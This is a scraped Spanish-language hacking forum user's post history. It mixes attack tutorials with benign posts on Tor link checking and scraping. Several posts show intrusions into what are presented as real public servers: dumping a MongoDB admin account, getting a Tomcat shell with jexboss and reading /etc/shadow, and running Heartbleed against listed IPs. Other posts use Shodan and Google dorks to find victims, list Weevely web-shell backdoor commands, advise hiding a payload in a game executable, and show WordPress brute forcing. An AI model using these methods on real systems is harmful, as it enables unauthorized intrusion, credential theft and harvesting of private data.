No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Conectando al servidor de nuestra victima:

Código: php
root@kali:~# mongo --host 104.155.198.131




como vemos que nos hemos conectado al servidor por medio de la shell, ahora les enseñare el proceso de sintaxis de mongodb para poder interactuar en la base de datos.



Código: php
 > show dbs      
                - ver todas las base de datos.

Código: php
 > use shop                    
   - Escoger la base de datos para interactuar.


Código: php

> show tables   
                        - ver tas tablas de la base de datos.


Código: php
 > db.accounts.findOne() 
- Extraer todos los atributos de una tabla.

Lo primero que hice fue establecer una vista a las base de datos del servidor, posteriormente escogí la base de datos llamada "shop", luego ejecute show tables para ver todas las tablas que tiene y sin dudar dumpie los datos de la tabla "accounts" y pude obtener los atributos de dicha credencial:

Código: php
"name" : "[email protected]",
"email" : "[email protected]",
"password" :   "$2a$07$342f56c383d6bd241ed54OLVQdfEDP3jZA.PiaO8BGP3yosLCevRy",
"roles" : [
"admin"


de igual manera tu puedes editar todo los atributos de las columnas porque tienes todos los privilegios necesarios, si eres de las personas que se aburren escribiendo todo en texto plano dichas sintaxis, puedes instalar "Robomongo" - GUI para facilitarte todo este proceso:



Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pentesting

Explotando un servidor apache obteniendo una SHELL por medio del fallo 5-5.
de tomcat.

EL fallo tiene mucho tiempo de a ver sido descubierto, hace mucho  tiempo, en mi caso hubiera elegido hacerlo por msfconsole pero me dio mucha flojera xD
ya que me hubiera gustado enseñarles como auditar un servidor apache para saber si es o no vulnerable, y explotarlo por diferentes maneras, pero creo que por mas técnicas que les enseñe, todo ese proceso puedo ser optimizado por el siguiente exploit:

"Jexboss"


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Descarga:

Código: php
root@kali:~# git clone https://github.com/joaomatosf/jexboss


Encontrar servidores vulnerables:

Server: Apache-Coyote/1.1 Tomcat-5.5



En mi caso elegí un servidor de mi país:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si desean utilizar una búsqueda personalizada pueden utilizar las siguientes dorks:

country:es           "PAÍS"
city:barcelona     "CIUDAD"
hostname:es        "DOMINIO"

ustedes pueden efectuar cualquier rango de país que deseen.

Código: php
root@kali:~#cd tomcat

root@kali:~/tomcat# python jexboss.py -host http://190.102.149.180:8080/




como vemos hemos obtenido una sesión por medio de una shell, lo que haremos sera verificar en que S.O esta corriendo, por mi parte viendo que es un ordenador peruano, suponía que seria un windows server xD!



Les dejare algo en claro, si el sistema operativo es "WINDOWS" debemos utilizar interpretes de comandos #CMD, para poder interactuar correctamente con el servidor.



Si fuese un sistema "GNU" puedes utilizar el comando "uname -a" para saber la kernel que esta utilizando, pero este exploit automáticamente te detecta y muestra el kernel.



la navegación muy diferente un ejemplo para ver los directorios y que permisos tendríamos ejecutan: ls -la.

si deseas obtener credenciales del usuario del sistema operativo utilizaremos 2 comandos:



Código: php
Shell> cat /etc/passwd - sirve para verificar los usuarios que corren en diferentes servicios.

Shell> cat /etc/shadow -dumpear credenciales de servicios principales.

Credencial:

root:$6$3cdgngze$gafERX.OCPKvDAhgp9WyriAnR/iuDBZq6WjcZxe8BaFGga/Z5Zz1cCfj7aCxrrZB20RL3j6frbVBDzCZiCa9g0:17107:0:99999:7:::

Bueno si deseas obtener la contraseña puedes hacerlo por "brute force" o simplemente ejecutando una sesión meterpreter por msfconsole y empezar a desmadrar el servidor, por un Exploit local.

Cabe decir que el exploit recientemente ha sido actualizado, con la cual se han añadido mas servicios vulnerables y un "BYPASS" sobre algunos WAF.


Exploit heartbreak


Sin duda uno de los BUG's mas peligrosos a nivel mundial, que se descubrió en el año 2014, aun recuerdo esos años con el foro BlackLastSecurity que funde con mi buen amigo, Kelvin Parra.

Empresas importantes a nivel mundial fueron victima de ataques como:
Youtube, Facebook, Google, Twitter, etc, un 99.9 % de servidores a nivel mundial fueron comprometidos en aquel entonces.
Seguimos con algunos "Tips", si bien es cierto algunas personas no han explotado un servidor con la vulnerabilidad Open SSL llamado Heartbleed.

Si deseas encontrar algunos de estos servidores vulnerables "SHODAN" te ofrece una búsqueda avanzada:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Tenemos 141,927 resultados, para que vayan experimentando este tipo de ataque.

Exploit:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una ves descargado lo extraemos con el nombre de la carpeta "bleed", posteriormente pasaremos a ingresar a dicha carpeta.
Código: php

root@kali:~# cd bleed


modo de uso la mayoría de dispositivos encontrados trabajan con el puerto 443:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: php

root@kali:~# python heartbleed.py 209.166.152.220


Se ejecutaría de esta manera, sin el puerto por el simple hecho de tener el puerto por default


Este host corre el servicio en el puerto 8443:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Entonces lo ejecutaríamos de esta manera:

Código: php
root@kali:~# python heartbleed.py 188.165.216.132 8443




Hemos explotado el servidor correctamente capturando el trafico de peticiones en vivo, este bug es temido porque captura el trafico de datos de peticiones de la web en su totalidad, cabe decir que si una "organización" grande como facebook en el 2014 millones de peticiones se hacían por minuto, cuantas credenciales fueron capturadas en vivo.

Ahora imagínese en empresas millonarias como PayPal, Ebay, etc el dolor de cabeza que tuvieron en aquel entonces y los millones de dolares que se perdieron.

por ultimo no quiero hacer este POST demasiado largo con otros métodos, espero haberles ayudado.

Saludos!
#47
Hi, por lo que veo eres muy paranoico hermano.

Este POST esta enfocado practicamente al lado "LEGAL" de un trabajo de Auditoria, la cual no existe ningun problema si tu "IP" esta en todos los logs del servidor apache ya que estas realizando un trabajo bajo contrato, otro punto aun ASI utilices "VPN" "PROXYS" , los nodos SOCKS5  de "TOR", si te metes con la persona incorrecta te encontrara y veras la parca en una moto.

Saludos.

8)
#48


Saludos hermanos de underc0de, estuve alejado por motivos de estudio pero ya regrese nuevamente, en esta oportunidad les traigo una herramienta muy útil para los amantes de la "Deep Web" llamada Onioff.

Como bien sabemos Tor Browser es el un servicio de Anonimato cuyas conexiones trabajan de manera independiente denominadas "Nodos", las cuales tienen conexiones "Socks4" y "Socks5".

Si no conoces el servidor Tor, me encantaría que visites mi segundo Post donde enseño como instarlo y configurarlo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 

El siguiente POST es sobre su mensajería encriptada de Tor, las cuales pueden ser utilizadas en Gmail, etc.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si deseas crear tu servidor "Onion" desde tu Debian puedes visitar este Post.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Onioff


Onioff es una herramienta Open Source simple, cuyo fin es verificar que los servidores web onion esten disponible o no.

¿Quien no se aburre de encontrar un link y pegarlo en nuestro navegador Tor para verificar si esta valido o no, introduciéndolo uno por uno?
Pues llego la solución a nuestro problema.

Descarga

Código: php
root@kali:~# git clone https://github.com/k4m4/onioff.git
ot@kali:~# cd onioff
root@kali:~/onioff# pip install -r requirements.txt




En mi caso los requisitos ya los tenia instalado, con ustedes ese procedimiento sera mas extenso ya que descargara cada paquete y luego procedera a instalarse.

Modo de Uso

Si desean ver las opciones pueden utilizar su sintaxis, pero antes debemos darle privilegios a la carpeta.

Código: php
root@kali:~/onioff# chmod 775 *
root@kali:~/onioff# python onioff.py -h




Como podemos ver esta herramienta tiene 2 formas de testear los links de manera independiente o ejecutando un archivo en .txt con varias cantidades de paginas.

Primero deben tener instalado "Tor" como servicio dependiente en GNU/debian - Kali linux como otros S.O de seguridad Informática, tiene instalado por defecto dicho servicio no hay necesidad de instalarlo.

Si no lo tienes lo puedes instalar de la siguiente manera:

Código: php
root@kali:~/onioff#apt-get install tor


Ejemplos

Antes de ejecutarlo deben iniciar el servicio de tor de la siguiente manera:
Código: php

root@kali:~/onioff# service tor start // iniciar servidor tor
root@kali:~/onioff# service tor status // ver el estado del servicio si se encuentra activo




Haremos el primer ejemplo, que sera ejecutar la verificación de un solo link en onioff, para comprobar su funcionalidad.

Código: php
root@kali:~/onioff# python onioff.py http://kpdqsslspgfwfjpw.onion/




Como vemos el servidor onion ,esta fuera de servicio.

Introducimos otro link en este caso es del buscador " DuckDuckgo "



seguiremos con el segundo ejemplo, primero crearemos un archivo con Extensión "TXT" lo llamare links.txt donde añadiremos los links de los servidores onion que deseemos testear.



Luego de ello pasaremos a ejecutarlo se la siguiente manera:

Código: php
root@kali:~/onioff# python onioff.py -f links.txt -o reporte.txt

pasare a explicar sus argumentos:

-f (añades el nombre del archivo) 

-o (nombre del archivo donde se guardara los datos positivos)



  Les dejare algunos servidores web donde podran encontrar muchos servidores Onion para que hagan su TEST, se que les encatara.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias por visitar este humilde Post, Saludos y éxitos para todos.
#49
Underc0de / Re:Bases para ser Staff
Julio 19, 2016, 10:12:09 AM
Me gustaría ser moderador de la plataforma de Hacking, espero puedan responderme, ante mano muchas gracias  8) : )
#50
Hacking / Re:Connect Remote MySQL Web Owned
Junio 02, 2016, 08:14:51 PM
Saludos, hay 2 formas poder conectarte por la IP de la web o del servidor alojado o por otra parte, el servidor no recibe conexiones remotas.

por ejemplo yo al conectarme como viste en la imagen NO me conecte por la IP: 200.68.5.25 , que en ese entonces estaba en el NS "de  'telefonica.cl.east-1.amazonaws.com..........', hay varios factores. 

Saludos.

#51
Gracias por sus buenos deseos compañeros, en cuanto a la ayuda lo necesitare mas adelante  y obligatoria mente contare con algunos de ustedes.

Saludos, no los decepcionare  8)

#52
Hola hermano es muy fácil escalar privilegios lo puedes elaborar primero en metasploit Framework + shellter compilando un payload "con permisos administrativos" en tu SETUP.EXE o cualquier nombre, pero que sea ejecutable en modo administrador preferiblemente un "steam.exe" de "DOTA" un claro ejemplo que te puedo dar, ya que tiene por defecto que el sistema lo ejecute modo "adm", otro punto existe el siguiente EXPLOIT, algo muy conocido pero que hasta el dia de hoy funciona en windows 10 y anteriores versiones. te dejo un post que realice tal proceso:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


De igual manera puedes utilizar Empire para "Romper la seguridad "UAC" y escalar privilegios de manera mas remota.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos : )

#53

Saludos underc0deanos, tengo una gran noticia para toda la comunidad, estoy elaborando un libro de 200 hojas sobre Pentesting a nombre de la comunidad Underc0de, titulado:

"Undertesting - Kali Linux 2016 Release"



siempre y cuando los administradores me den el SI.

El libro lo liberare en un PDF sera totalmente FREE : )
#54
Eso que me falto elaborar un Rooting, Saludos 8)
#55
Buenas noches hermano, aunque de todos esos candados yo me quedo con la app latch de la empresa eleven path, gran contribución hermano, saludos y éxitos en todo  8)
#56

Siguiendo con la maraton de POST'S hermanos xD , enseñare a como fixear el Weevely en nuestro Kali Linux,
Weevely es una shell de línea de comandos web ampliado dinámica mente por la red en tiempo de ejecución diseñado para la administración remota y la prueba de testeo. proporciona una consola tipo telnet a través de un código en php que se ejecutara en el objetivo remotamente, incluso en ambientes restringidos.

El proceso ejecuta el footprint y más de 30 módulos con metasploit extensible para administrar, llevar a cabo una prueba de testeo, después de la hazaña, y auditar la web remotamente con el fin de escalar privilegios para un análisis màs profundo en las redes internas.

Los módulos incluyen:


  • Terminal de red Shell / PHP telnet
    Errores de configuración de servidor común de auditoría
    Consola de SQL pivotando en el blanco
    Proxy tráfico HTTP a través de destino
    Monte el sistema de archivos de destino para el punto de montaje local
    Análisis de red Conducta pivotantes en el blanco
    Carga de archivos y la descarga
    Inversa de Spawn y TCP directos
    Cuentas de servicios de fuerza bruta
    Comprimir y descomprimir zip, gzip, bzip2 y alquitrán archivos

Referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Antes que nada, vamos a actualizar nuestro weevely en este caso, kali linux. para ellos pasaremos a descargar el archivo y proceder a la instalación de dependencias.

Este post lo hice ya que hace momentos uno de mis colegas mi pidió que le ayudase a reparar el fallo, ya que no podría ejecutar la conexión  remota y por ende les salían errores de lineas de código:



como vemos, directamente el código no dice que faltan módulos para que se ejecute la conexiones mediante sock, entonces lo que haré sera instalar la versión con sus repertorios actualizando de Pysocks :

Código: php
root@kali:~# git clone https://github.com/Anorov/PySocks.git
root@kali:~# chmod 775 *
root@kali:~# python setup.py build
root@kali:~# python setup.py install



una ves instalado todo los repertorios socks, pasaremos a ejecutar el weevely que llega por default en Kali Linux:


Si desean descargan la nueva versión, con algunos complementos nuevos, lo pueden hacer de la siguiente manera.


Aprendiendo algunos comandos

:audit_filesystem - Auditando carpetas el sistema


:audit_etcpasswd - El archivo /etc /passwd es la base de datos basada en texto plano de información sobre los usuarios del sistema dedicado, la cual puede ser aprovechado para una recolección de datos aprovechados para un symlink.


:system_info - Información del sistema
:uname-a     - información del kernel
:net_ifconfig - lista rangos del servicio



Otros comandos:

Código: php
                                                      
:audit_phpconf        Audit PHP configuration.                                             
:audit_suidsgid       Find files with SUID or SGID flags.                                 
:shell_sh             Execute Shell commands.                                             
:shell_su             Elevate privileges with su command.                                 
:shell_php            Execute PHP commands.                                               
:system_extensions    Collect PHP and webserver extension list.                                                                     
:backdoor_reversetcp  Execute a reverse TCP shell.                                         
:backdoor_tcp         Spawn a shell on a TCP port.                                         
:bruteforce_sql       Bruteforce SQL database.                                             
:file_find            Find files with given names and attributes.                         
:file_upload          Upload file to remote filesystem.                                   
:file_grep            Print lines matching a pattern in multiple files.                   
:file_enum            Check existence and permissions of a list of paths.                 
:file_clearlog        Simple Clear Log                                                     
:file_rm              Remove remote file.                                                 
:file_edit            Edit remote file on a local editor.                                 
:file_upload2web      Upload file automatically to a web folder and get corresponding URL.
:file_bzip2           Compress or expand bzip2 files.                                     
:file_cp              Copy single file.                                                   
:file_check           Get remote file information.                                         
:file_read            Read remote file from the remote filesystem.                         
:file_touch           Change file timestamp.                                               
:file_mount           Mount remote filesystem using HTTPfs.                               
:file_cd              Change current working directory.                                   
:file_gzip            Compress or expand gzip files.                                       
:file_zip             Compress or expand zip files.                                       
:file_webdownload     Download URL to the filesystem                                       
:file_download        Download file to remote filesystem.                                 
:file_tar             Compress or expand tar archives.                                     
:file_ls              List directory content.                                             
:sql_console          Execute SQL query or run console.                                   
:sql_dump             Multi dbms mysqldump replacement.                                   
:net_phpproxy         Install PHP proxy on the target.                                     
:net_proxy            Proxify local HTTP traffic passing through the target.               
:net_scan             TCP Port scan.                                                       
:net_mail             Send mail.                                                           
:net_curl             Perform a curl-like HTTP request.                                   


Sin mas que decir, no hace falta ejecutar algunos owned a dicho servidor por motivos de ética, ante mano espero les haya gustado este articulo!
#57

Buenos dias hermanos de Underc0de he elaborado un POST bien especifico de como funciona un ataque de Fuerza Bruta o Brute Force en el CMS Wordpress.

Durante ya varios años, tenemos una herramienta llamada "WPSCAN" que se especializa en Análisis de Auditoria activa y pasiva.

Este es un ejemplo de un simple análisis que realice años atrás

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Brute Force: Este ataque en general se lleva acabo como ultimo recurso para explotar un servidor obteniendo las credenciales de "Usuario" y "Contraseña" mediante las palabras de un "Diccionario",
cabe aclarar que si una contraseña es bien formulado con caracteres Alfa Numéricos y teclas especiales, el ataque de fuerza bruta varia de la capacidad del sistema.


Como podemos ver, este es el panel que tiene "WORDPRESS", el cual puede ser modificado en la interfaz a gusto del WebMaster

Lo que primero debemos es identificar el nombre de usuario del sitio web, para ello no lo haremos con ninguna herramienta, si no con el arte de "Ver"


Al entrar a un sitio web hecho en Wordpress, vemos la siguiente "Plantilla", en mi caso hay un tema que se llama "CyberPunks Hackers", Entonces lo que haré sera entrar en ella.


Se dieron cuenta de algo¿?, Wordpress enumera los nombres de usuarios en cada "Tema" creados por los mismos, entonces vemos que el usuario se llama "CyberSecRoot"

Entonces vamos a dirigimos a Wpscan, pero antes vamos a crear nuestro diccionario o descargarlo a complejidad de cada uno.

Como vemos tengo creado un diccionario con algo de 30 palabras, que es el siguiente:


vamos a utilizar este diccionario para elaborar nuestro ataque de fuerza bruta.

Código: php
root@kali:~# wpscan --url http://192.168.217.1/wordpress/ --wordlist /root/passwords.txt --username CyberSecRoot


Comprendamos algo :

--wordlist = /root/passwords.txt  (Es el lugar donde esta almacenado nuestro diccionario)

--username CyberSecRoot (Es el nombre de usuario que vamos a obtener su contraseña)


Vemos que nos salio en blanco "Password", ya que no ha capturado la contraseña porque el "Diccionario" no cuenta en su sintaxis dicha credencial.

Entonces vamos a hacer una prueba elaborada con un diccionario personalizado que lo he sacado de Internet, que es el siguiente:


Código: php
root@kali:~# wpscan --url http://192.168.217.1/wordpress/ --wordlist /root/diccionario.txt --username CyberSecRoot



Como vemos el ataque de fuerza bruta fue exitoso:

  +----+--------------+------+-------------+
  | Id | Login       | Name | Password    |
  +----+--------------+------+-------------+
  |    | CyberSecRoot |     | universidad |
  +----+--------------+------+-------------+

La contraseña como vemos es "universidad" vamos a probarla:




Fue un éxito, el registro de dichas credenciales y método es 100% funcional si la contraseña se encuentra en nuestro diccionario.


Saludos  : )
#58
Buenas tardes hermano, totalmente concuerdo contigo la mejora manera es hacerlo Manual, pero si tenemos un tiempo corto podemos Automátizar el proceso con algunas herramientas, pero al final sabemos que nos arrroje un falla o un falso positivoz saludos hermano  8)
#59
Pentesting / Method Ninja of Google Hacking
Mayo 29, 2016, 02:26:05 PM


Saludos antes de comenzar a redactar, deseo mandar saludos a un buen hermano con el seudónimo "Eduardo Desdes" la cual me a demostrado métodos nuevos de utilizar las Dorks de manera mas compleja, ya que no me gusta mucho dorkear.

Como sabemos Google es un servicio de indexación  de paginas web's,fotos,ftps,ips,entre muchos datos que se alojan cuando utilizamos dicho servicio de manera respectiva.

Ejemplo de lo que sucede al navegar en Google

Al hacer clic en Enviar, Google rastrea e indexa el contenido de la URL tal como está en ese momento. Si cambias el contenido de una URL que tiene pendiente una solicitud de envío, es posible que los resultados del nuevo rastreo sean distintos a los resultados obtenidos con Explorar como Google. Asimismo, como Google vuelve a rastrear la página al enviarla, no importa si la URL que envías se ha analizado mediante la herramienta Explorar como Google con o sin procesamiento.

Una vez enviada la URL, es posible que tengas que esperar un poco hasta que Google procese la solicitud y rastree e indexe la página.



Google nuestra arma de auditar de manera manual


Hemos hablado respectivamente que google es un buscador de todo tipo de datos a nivel mundial ya que contiene millones de millones de sitios enlazados al servicio del publico.

Para un auditor google es la mejor arma en todos los sentidos ya que nos va facilitar el trabajo de intelectual con un objetivo que deseamos auditar de manera rápida  y eficaz  al momento de concatenar con las denominadas " Dorks of Google " combinándolas para tener un mayor desenlace en nuestro objetivo.

Plataforma del atacante



Uno de los servicios donde liberan miles de wikileaks es sin duda  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta durante los años de vigencia de este servicio se a alojado información de alto prestigio, pero lo que nosotros necesitaremos serán los Posts de dorks que podremos obtener mediante su búsqueda hasta el momento nos a indexeado 1,930 resultados ojo debo aclarar que  dicho servicio nos dará información de cualquier tipo de dorks como documentos,archivos,ftp,ip,cámaras e infinidades de dispositivos que tengan una interface de protocolo en la red mundial.

Todos hemos utilizado algunas dorks como:

Inurl:/noticias.php?id=
inurl:/eventos.php?id=
inurl:/detalles.php?id=
inurl:/principal.php?id=
inurl:/imagenes.php?id=
inurl:/videos.php?id=

Entre otras muchas que hemos visto en la web.



como vemos nos arrojan varios parámetros GET con la palabra noticias.php?id= , todo el mundo lo hace de manera recurrente consiguiendo mayormente vulnerabilidades de sql inyección.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'6' at line 1


Google es una gran base de datos donde se acumulan muchos datos sensibles por el descuido de los mismo administradores , depende del usuario malicioso para usar esta información para su conveniencia

Explicación de las dorks :

Las Dorks son una serie de sentencias conformadas por operadores de búsqueda avanzada de google , que nos sirve para perfeccionar nuestra búsqueda y para encontrar paginas vulnerables. A continuación mencionare unos cuantos comando principales.

inurl:(panel) el buscador mostrara todos los resultados tal que en su url este la palabra 'panel'

intitle:(inicio) el buscador mostrara todos los resultados tal que en su titulo de pagina este la palabra 'inicio'

intext:(contraseña) el buscador mostrara todos los resultados tal que en el texto se su pagina este la palabra 'contraseña'

filetype:(pdf) el buscador mostrara todos los resultados que sean de tipo pdf eso se puede reemplazar por php, html , jpg y cualquier otro archivo.

site:(edu.pe) el buscador mostrara todos los resultados tal que su dominio sea No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Se pueden poner mas de una palabra (esto sirve para todo los comandos) por ejemplo:

intext:(contraseña usuario) Muestra los resultados que tengan la cadena 'contraseña usuario'

intext:(contraseña & usuario) Muestra los resultados que tengan 'contraseña' y 'usuario'

intext:(contraseña | usuario) Muestra los resultados que tengan 'contraseña' o 'usuario'

Se puede quitar resultados (esto sirve para todo los comandos) por ejemplo:

intext:(contraseña usuario) -intext:(sangre) Muestra los resultados que tengan la cadena 'contraseña usuario' y que no tengan la palabra 'sangre'

Ahora solo queda en su imaginación las dorks que desean armar  ! Por ejemplo

site:edu.pe intext:(usuario contraseña) filetype:php Esto mostrara los paneles de las webs de las universidades , al menos los de tipo php y que estén en español

site:pe intext:(femenino & telefono) filetype:xls Esto mostrara los teléfonos de mujeres del Perú jajaja.


Escenario dirigido a un servidor web:

Una anécdota que me encanto fue cuando  estuve auditando de manera manual y a la vez con burp Suite y una herramienta privada que programe la cual consta de hacer un escaneo general capturando al servidor de manera completa y efectiva de todos los archivos,módulos y demás que tengan en la misma.

Algún día liberare mi herramienta,pero por el momento estará en mi a mi disposición personal.

Cyberscan.py





la vulnerabilidad fue reportado, espero lo hayan parchado.


la adecdota es que con mi camarada Eduardo Desdes, estuvimos auditando una web "X", entonces empece a utilizar las herramientas que comente hace momentos, cabe destacar que la herramienta estaba en Joomla, me parecio interesante pero lo único que encontraba era falsos positivos y algunos XSS ya que por mi parte los encontraba de forma manual, por otra mi herramienta capturada el sitio web, entonces empece aburrirme y mi camarada me comento lo siguiente "Encontré un Error", mi primera impresión fue "WTF" como lo hiciste? ni con Joomscan xD! y me dijo pues " utilice una dork".me recordó a mis comienzos cuando buscaba parámetros  GET and POST para encontrar fallos a sitios arbitrarios o a un objetivo central

Lo interesante de todo esto es que me había olvidado de hacer un dns inverso al sitio web para ver que tiene sus subdominios.

Entonces fue cuando me enseño una dork peculiar :

site:ejemplo.gob.pe inurl:& -inurl:index.php

Entonces me di cuenta cuando ejecute la sentencia ' que era una Sql inyección ciega pues mi camarada efectivamente lo había explotado : )

Entonces comprobé la dork y efectivamente me sorprendió.



El mejor  consejo que puedo dar es que no hay que discriminar, ni disminuir lo que las dork pueden encontrar mediante una búsqueda configurada para obtener datos dedicados para un ataque dirigido, aveces recordar nuestros comienzos pueden ser  utilices a la hora de utilizarlos, Gracias.

#60
Python / Re:Web Scraping
Mayo 28, 2016, 03:55:12 PM
Que buen POST!, justo me estoy iniciando en python y que mejor aprendizaje que comenzar con los paquetes requests y mechanize para respuestas y envíos de servicios web  +10